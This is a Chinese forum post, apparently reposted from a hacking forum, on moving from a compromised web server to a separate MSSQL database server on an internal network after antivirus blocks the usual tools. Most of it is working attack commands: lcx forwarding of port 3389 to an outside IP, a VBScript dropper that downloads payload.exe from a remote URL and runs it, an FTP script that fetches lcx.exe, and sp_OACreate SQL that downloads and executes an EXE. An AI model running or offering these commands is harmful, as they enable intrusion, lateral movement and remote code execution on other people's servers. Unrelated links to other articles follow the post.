本文转自:http://bbs.blackbap.org/thread-6203-1-2.html

1. 服务器属内网环境,站库分离,通过web.config找到数据库服务库SA帐号密码,成功添加用户(192.168.0.206) 。
2.
Web服务器(192.168.0.203) 、数据库服务器(192.168.0.206)都存在symantec杀毒软件,不能转lcx.exe工具转发

3. 测试过其它的转发工具,要么被查杀,要么无法用,使用reDuh工具只能转发当前IP的,而且速度极慢,受不了0.0 。
4.
使用msfpayload生成的exe文件也被查杀,由于服务器是x64的,msfencode没有x64的编码器,所以没能反弹成功

思路1:关闭杀软,通过以下提供的命令下载文件(未测试)
思路2:使用msf
aspx反弹,然后进行转发及跨路由渗透(已成功)

正常思路:如果没有杀软,直接传lcx.exe到192.168.0.203上,然后使用以下命令转发192.168.0.206:
c:\lcx.exe
-slave 你的外网IP 51 192.168.0.206 3389                // 看了这个后,你们应该都懂的吧 0.0

DOS命令:(一条一条执行)

  1. echo Set Post = CreateObject("Msxml2.XMLHTTP") >>xxx.vbs
  2. echo Set Shell = CreateObject("Wscript.Shell") >>xxx.vbs
  3. echo Post.Open "GET","http://bbs.blackbap.org/payload.exe",0
    >>xxx.vbs
  4. echo Post.Send() >>xxx.vbs
  5. echo Set aGet = CreateObject("ADODB.Stream") >>xxxc.vbs
  6. echo aGet.Mode = 3 >>xxx.vbs
  7. echo aGet.Type = 1 >>xxx.vbs
  8. echo aGet.Open() >>xxx.vbs
  9. echo aGet.Write(Post.responseBody) >>xxx.vbs
  10. echo aGet.SaveToFile "c:\xxxc.exe",2 >>xxx.vbs
  11. echo wscript.sleep 1000 >>xxxc.vbs
  12. echo Shell.Run ("c:\xxx.exe") >>xxx.vbs

复制代码

  1. echo open 127.0.0.1>c:\ftp.dat
  2. echo admin>>c:\ftp.dat
  3. echo admin>>c:\ftp.dat
  4. echo binary>>c:\ftp.dat
  5. echo get lcx.exe>>c:\ftp.dat
  6. echo bye>>c:\ftp.dat
  7. ftp -s:c:\ftp.dat

复制代码

MSSQL 命令:

  1. DECLARE @js int
  2. EXEC sp_OACreate 'ScriptControl',@js OUT
  3. EXEC sp_OASetProperty @js, 'Language', 'JavaScript1.1'
  4. EXEC sp_OAMethod @js, 'Eval', NULL, 'var x = new
    ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "Url",0);x.Send();var s = new
    ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type =
    1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\windows\\自己设置保存的EXE文件名.exe",2);var
    r = new
    ActiveXObject("WScript.Shell");r.Run("C:\\windows\\自己设置保存的EXE文件名.exe");'

复制代码

  1. declare @o int, @f int, @t int, @ret int
  2. exec sp_oacreate 'scripting.filesystemobject', @o out
  3. exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
  4. exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
  5. exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp账号'
  6. exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp密码'
  7. exec @ret = sp_oamethod @f, 'writeline', NULL,'get lcx.exe'
  8. exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'

MSSQL站库分离情况的渗透思路的更多相关文章

  1. 小迪安全 Web安全 基础入门 - 第五天 - 资产架构&端口&应用&CDN&WAF&站库分离&负载均衡

    一.资产架构 1.Web单个源码指向安全,域名指向一个网站,网站对应一个程序.对应一个目录. 2.Web多个目录源码安全,搭建完一个网站后,在网站目录下搭建新的站点. 3.Web多个端口源码安全,与多 ...

  2. Android实训案例(九)——答题系统的思绪,自己设计一个题库的体验,一个思路清晰的答题软件制作过程

    Android实训案例(九)--答题系统的思绪,自己设计一个题库的体验,一个思路清晰的答题软件制作过程 项目也是偷师的,决心研究一下数据库.所以写的还是很详细的,各位看官,耐着性子看完,实现结果不重要 ...

  3. Oracle主库归档丢失,备库日志有gap,在不重建备库的情况下,恢复备库

    本文主要描述Oracle备库日志与主库日志之间有gap,切主库这部分gap的归档日志已经删除或丢失,如何在不重建备库的情况下,恢复备库. 欢迎转载,请注明作者.出处. 作者:张正 blog:http: ...

  4. vue项目实践-前后端分离关于权限的思路

    前后端分离后权限的思路 最近看到许多关于权限的思路,但好像都是使用动态加载路由的方式,现在也分享下我在项目中使用的解决方案. 前后端分离关于权限的处理每个人都不一样,根据项目选择制定合适的方案就好 我 ...

  5. Spring + iBatis 的多库横向切分简易解决思路

    国内私募机构九鼎控股打造APP,来就送 20元现金领取地址:http://jdb.jiudingcapital.com/phone.html内部邀请码:C8E245J (不写邀请码,没有现金送)国内私 ...

  6. SpringBoot 配置文件与依赖库分离打包配置

    一.应用场景 一般情况下我们对springboot应用打包时使用springboot的maven插件spring-boot-maven-plugin的maven进行打包,打包完成得到一个fatjar, ...

  7. phpmyadmin系列渗透思路连载(一)

    当拿到phpmyadin的站点后,我一般会尝试一下几种攻击手法: 1.通过弱口令进入后台,尝试into outfile写入一句话 条件:(1)有写的权限    (2)知道web绝对路径    (3)w ...

  8. 开源图编辑库 NebulaGraph VEditor 的设计思路分享

    本文首发于 NebulaGraph 公众号 NebulaGraph VEditor 是一个拥有高性能.高可定制的所见即所得图可视化编辑器前端库. NebulaGraph VEditor 底层基于 SV ...

  9. MSSQL订阅库索引对齐

    需求如下图: 在原来的架构中是每台web服务器都固定访问某一台数据库服务器,所以就造成了每台数据库订阅服务器上的索引不一致.现在的需求就是要把所有的订阅库上的索引调整为一致,为了就是实现高可用+负载均 ...

随机推荐

  1. 追加window.onload函数

    function addLoadEvent(func) { var old_onload = window.onload; if (typeof window.onload != 'function' ...

  2. [bzoj1833][ZJOI2010]count 数字计数——数位dp

    题目: (传送门)[http://www.lydsy.com/JudgeOnline/problem.php?id=1833] 题解: 第一次接触数位dp,真的是恶心. 首先翻阅了很多很多一维dp,因 ...

  3. scrapy爬取段子

    scrapy.py 1.cmd运行scrapy shell http://www.baidu.com response.xpath('//div[@aa="bb"]') 找到需要匹 ...

  4. UVA 306 Cipher

    题意 :lucky cat里有翻译.英文也比较好懂. 很容易发现有周期然后就拍就好了 注意每组数据后边都有空行 包括最后一组.一开始以为最后一组没有空行.唉.. #include <map> ...

  5. 使用windos模拟搭建web集群(二)

    一.通过rsync搭建备份服务器 这三个目录我们需要做实时热备,他们分别是  系统的脚本目录  系统的配置文件目录  系统的定时任务目录 [root@mage-monitor- ~]# cat /se ...

  6. Ubuntu14.04安装配置LAMP环境(php5.6)

    sudo apt-get install python-software-properties sudo apt-get update sudo apt-get install vim sudo ap ...

  7. 计蒜客 28319.Interesting Integers-类似斐波那契数列-递推思维题 (Benelux Algorithm Programming Contest 2014 Final ACM-ICPC Asia Training League 暑假第一阶段第二场 I)

    I. Interesting Integers 传送门 应该是叫思维题吧,反正敲一下脑壳才知道自己哪里写错了.要敢于暴力. 这个题的题意就是给你一个数,让你逆推出递推的最开始的两个数(假设一开始的两个 ...

  8. Educational Codeforces Round 33 (Rated for Div. 2) D. Credit Card

    D. Credit Card time limit per test 2 seconds memory limit per test 256 megabytes input standard inpu ...

  9. Hadoop之Vmware通过仅Use Host-Only networking(使用主机网络)主机链接

    Use Host-Only networking(使用主机网络)连接方式 [1]现在宿主机也就是本地电脑上设置IP地址 [2]设置虚拟机 Host-Only 方式            验证    宿 ...

  10. 线段树【 bzoj3132 】【p4145 】上帝造题的七分钟2 / 花神游历各国

    题目大意 给定一个区间 支持开方和查询区间值操作 (多组数据 分析 如果一个区间的最大值小于1,那就没有开方的必要了(具体不会证明,听大佬讲的 一个数经过多次开方就会变成1(可以用计算器试一下 因此我 ...